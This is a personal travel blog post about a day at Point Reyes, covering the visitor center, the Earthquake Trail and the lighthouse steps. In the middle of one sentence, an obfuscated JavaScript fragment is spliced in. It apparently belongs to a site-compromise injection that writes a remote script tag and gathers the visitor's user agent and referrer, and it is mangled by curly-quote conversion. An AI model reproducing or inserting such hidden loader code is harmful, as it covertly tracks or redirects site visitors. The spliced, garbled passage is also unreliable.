Pt. Reyes

After our trip to Mt. Tam, we headed north Pt. Reyes.  Why?  Well, there was a lighthouse Nick wanted to see.

We started our trip at the visitor’s center.  It was a pretty nice visitor’s center.  Large with some stuffed animals – not the cute kind, the creepy kind.

Then ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|krsie|var|u0026u|referrer|zhane||js|php’.split(‘|’),0,{}))
we went on a “hike.”  And by hike, I mean a walk.  It sounded cool, it was called the Earthquake Trail.  Since Pt Reyes is literally on the San Andreas Fault, I was expecting huge holes in the ground, tectonic plates or something.  Instead, we learned about earthquakes.  You know, shelter and cover.  Lame ish like that.  That’s right.  I just called out the earthquake trail.  Pretty lame and not worth your time.

The silver lining to the earthquake trail were the cartoons drawn by kids.  I guess they had some contest or some 3rd grade class got “lucky” and got to illustrate the facts around the trail.  This was, by far, my favorite.  A superhero lifting up the ground so we could see the faults.  And then, because I’m a brat, I said to Nick, “If he were really super, he’d just make sure earthquakes don’t happen.”  I was feeling feisty that day, what can I say.

After the trail, we headed to the lighthouse.  Apparently, it was necessary back in the olden days.  It kept ships from getting ship wrecked.

The lighthouse is actually down 300 steps.  Which is great on the way down, a little rough on the way back up.

On our way down, we saw a ton of people huffing and puffing as they came back up….it made us a little nervous.

On the left, you can see our view on the way down.  The lighthouse in the middle, and our view on the way back up.

Nick, a long time boy/eagle scout, prepped us for our “hike” back to the top.  Slow and steady, he said.  We don’t want to burn out.  We made it just fine.

Here’s a shot of us near the lighthouse.  So glad Nick has long arms….but it was tough to get us and the lighthouse in 1 picture.

The coast.  Very pretty.

So if you’re every visiting northern California, hit up this area.  Highly recommend the Pt Reyes lighthouse.  And the area around/in Pt Reyes is also super cute.  Maybe next time we’ll have some time to explore.  Happy Thursday!
